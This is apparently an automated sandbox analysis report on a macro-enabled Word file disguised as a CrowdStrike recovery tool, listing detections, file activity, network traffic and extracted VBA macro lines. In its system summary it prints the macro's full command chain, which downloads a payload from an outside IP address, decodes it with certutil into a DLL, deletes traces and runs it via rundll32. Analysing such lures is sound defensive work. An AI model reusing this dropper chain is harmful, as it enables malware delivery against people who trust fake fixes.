Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

AV Detection

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp

Joe Sandbox ML: detected

Cryptography

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9BD0 CryptAcquireContextA,CryptCreateHash,		7_2_000000013F4D9BD0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,		7_2_000000013F4D9C20
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9C9C CryptHashData,		7_2_000000013F4D9C9C
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359BD0 CryptAcquireContextA,CryptCreateHash,		22_2_000000013F359BD0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,		22_2_000000013F359C20
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359C9C CryptHashData,		22_2_000000013F359C9C

Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_90c8dacc-4

Compliance

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3236_441263539			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: curl.pdb source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Networking

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A2738 recv,WSAGetLastError,

7_2_000000013F4A2738

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmp

Jump to behavior

Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe.4.dr	String found in binary or memory: Usage: curl [options...] <url>

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: sb-ssl.google.com

Source: unknown

HTTP traffic detected: POST /safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: sb-ssl.google.comConnection: keep-aliveContent-Length: 1073Content-Type: application/octet-streamSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	String found in binary or memory: http://172.104.160.
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:80X99
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://aka.ms/WRH
Source: document.xml	String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://azure.status.microsoft/status
Source: curl.exe	String found in binary or memory: https://curl.se/
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/P
Source: curl.exe	String found in binary or memory: https://curl.se/docs/copyright.html
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe.4.dr	String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary

Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)			Name: MainFunc
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")			Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "			Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "			Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")			Name: MainFunc
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)

Jump to dropped file

Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6529.tmp			Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6690.tmp			Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer7050.tmp			Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer601A.tmp			Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer60A7.tmp			Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6873.tmp			Jump to behavior

Source: C:\Windows\System32\certutil.exe

File deleted: C:\Windows\cer6529.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490F28		7_2_000000013F490F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F499B60		7_2_000000013F499B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4B1B00		7_2_000000013F4B1B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F497BAC		7_2_000000013F497BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4BCBDC		7_2_000000013F4BCBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490658		7_2_000000013F490658
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F481AB0		7_2_000000013F481AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4AE4F0		7_2_000000013F4AE4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F48A9B4		7_2_000000013F48A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A49D0		7_2_000000013F4A49D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4AADC8		7_2_000000013F4AADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49BDE0		7_2_000000013F49BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49B840		7_2_000000013F49B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F484860		7_2_000000013F484860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49F458		7_2_000000013F49F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4C0804		7_2_000000013F4C0804
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4944A4		7_2_000000013F4944A4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A88D8		7_2_000000013F4A88D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490C74		7_2_000000013F490C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4B2C88		7_2_000000013F4B2C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A7888		7_2_000000013F4A7888
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F331B00		22_2_000000013F331B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F319B60		22_2_000000013F319B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310F28		22_2_000000013F310F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F33CBDC		22_2_000000013F33CBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F317BAC		22_2_000000013F317BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310658		22_2_000000013F310658
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F301AB0		22_2_000000013F301AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F32E4F0		22_2_000000013F32E4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31BDE0		22_2_000000013F31BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F32ADC8		22_2_000000013F32ADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3249D0		22_2_000000013F3249D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F30A9B4		22_2_000000013F30A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F340804		22_2_000000013F340804
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31F458		22_2_000000013F31F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F304860		22_2_000000013F304860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31B840		22_2_000000013F31B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F332C88		22_2_000000013F332C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F327888		22_2_000000013F327888
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310C74		22_2_000000013F310C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3288D8		22_2_000000013F3288D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3144A4		22_2_000000013F3144A4

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open			Name: Document_Open
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: Sub Document_Open()

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA macros: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, VBA macros: true

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Stream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F48A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F495658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F321F00 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F321FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F4A1FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F314FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F315658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F30A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F494FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F4A1F00 appears 134 times

Source: classification engine

Classification label: mal88.expl.evad.winDOCM@51/26@4/3

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F483434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,

7_2_000000013F483434

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRAC07.tmp

Jump to behavior

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, Word Document stream: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.16.dr	OLE indicator, Word Document stream: true

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~WRC0001.tmp.16.dr	OLE document summary: title field not present or empty

Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ..............t........8Mw....f.......................v........v#.............			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ......@.......(x#.....q8Mw............................~........w#.............			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d......................*.......q(2w............			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....................H.......<...............#........d..............................................			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d......................,.......................			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............................................#........d..............................................			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!.............................p.......(.P.............................................#........3)...............!.....b.......................			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............................................#........3)...............................!.............			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dA............... .....*.......q(2w...... .....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................D...............#.......(dA............... ....................... .....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dA............... .....,................. .....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................\...............#.......(dA............... ....................... .....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!............................... .....(.P.............................`...............#........3)...............!.....b.........2....... .....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................d...............#........3).............(. ...............!....... .....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!..............Q.w....................(.P.....................D.......................#.......(d................!.............q(2w............			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....................D.......................#.......(d..............H.................!.............			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!.............x.6.....................(.P.....................D.......................#.........6...............!.....n... .r.e.t.u.r.........			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.6.....................(.P.....................D.......................#.........6.............h........... .r...!.............			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!..............Q.w....................(.P.............................................#.......p.$...............!.....j.......................			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ......P.(......^I.......uw......E.......(.............v........]I.............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ........(......`I.......uw......E..... .(.............~........^I.............
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d..............H.(.....*.......q(2w......(.....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(.......................7{..............#........d..............H.(.......................(.....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d..............H.(.....,.................(.....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(........................{..............#........d..............H.(.......................(.....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................ .(.....(.P.....(........................{..............#........3).....................b.........x.......(.....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(........................{..............#........3)...............(.......................(.....			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dF.....................*.......q(2w............			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(........................|..............#.......(dF.............................................			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dF.....................,.......................			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(.......................'|..............#.......(dF.............................................			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................p.......(.P.....(.......................+|..............#........3).....................b.........7.............			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(......................./|..............#........3).............................................			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w............ .......(.P.....(.......................v~..............#.......(d..............................q(2w............			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....(.......................z~..............#.......(d..............................................			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.#.............@.......(.P.....(.......................~~..............#.........#.....................n... .r.e.t.u.r.........			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.#.....................(.P.....(........................~..............#.........#......................... .r.................			Jump to behavior
